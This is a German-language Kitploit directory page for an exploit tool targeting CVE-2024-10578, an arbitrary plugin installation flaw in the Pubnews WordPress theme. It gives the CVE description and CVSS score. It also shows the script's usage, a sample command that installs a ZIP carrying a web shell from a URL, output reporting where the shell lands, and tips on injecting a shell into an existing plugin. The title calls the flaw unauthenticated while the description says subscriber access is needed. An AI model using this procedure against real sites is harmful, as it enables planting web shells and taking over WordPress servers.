Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10578 — Pubnews <= 1.0.7 - Nicht authentifizierte beliebige Plugin-Installation | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-10578
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubnxploited/cve-2024-10578

CVE-2024-10578

Pubnews <= 1.0.7 - Nicht authentifizierte beliebige Plugin-Installation

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-10578: Pubnews <= 1.0.7 - Unauthentifizierte beliebige Plugin-Installation

Beschreibung

Das Pubnews-Theme für WordPress ist anfällig für eine unbefugte beliebige Plugin-Installation aufgrund einer fehlenden Berechtigungsprüfung in der Funktion pubnews_importer_plugin_action_for_notice() in allen Versionen bis einschließlich 1.0.7. Diese Schwachstelle ermöglicht es authentifizierten Angreifern mit Zugriff auf Abonnentenebene und höher, beliebige Plugins zu installieren, die ausgenutzt werden können, um weitere Schwachstellen zu missbrauchen.

CWE

  • CWE-434: Uneingeschränktes Hochladen einer Datei mit gefährlichem Typ

CVSS

  • Score: 8.8 (HOCH)
  • Version: 3.1
  • Vektor-String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Exploit-Skript: wordpress_exploit.py

Dieses Skript nutzt die Schwachstelle im Pubnews-Theme aus, um ein beliebiges Plugin von einer bereitgestellten URL zu installieren. Das Plugin kann eine bösartige Shell oder eine andere Nutzlast enthalten.

Verwendung

root@kitploit:~

CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL

Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         The URL of the WordPress site
  -un, --username USERNAME
                        The username for WordPress login
  -p, --password PASSWORD
                        The password for WordPress login
  -url_zip, --plugin_url PLUGIN_URL
                        The plugin URL to install (must be a zip file with the shell injected inside)

Beispiel

root@kitploit:~
python 
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip

Ausgabe

root@kitploit:~
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/

Wichtige Hinweise

  • Die Plugin-URL muss ein direkter Link zu einer ZIP-Datei sein, die die Shell oder eine andere Nutzlast enthält.
  • Es wird empfohlen, ein vorhandenes WordPress-Plugin zu verwenden, die Shell darin zu injizieren und es dann erneut zu zippen. Laden Sie diese ZIP-Datei auf einen direkten Link hoch, um sie auszunutzen.

⚠️ Haftungsausschluss

Dieses Skript dient nur zu Bildungszwecken. Der Autor befürwortet nicht die Verwendung dieses Skripts für illegale Aktivitäten. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, für die Sie eine ausdrückliche Erlaubnis zum Testen haben.

Von: Nxploited | Khaled Alenazi

Tool herunterladen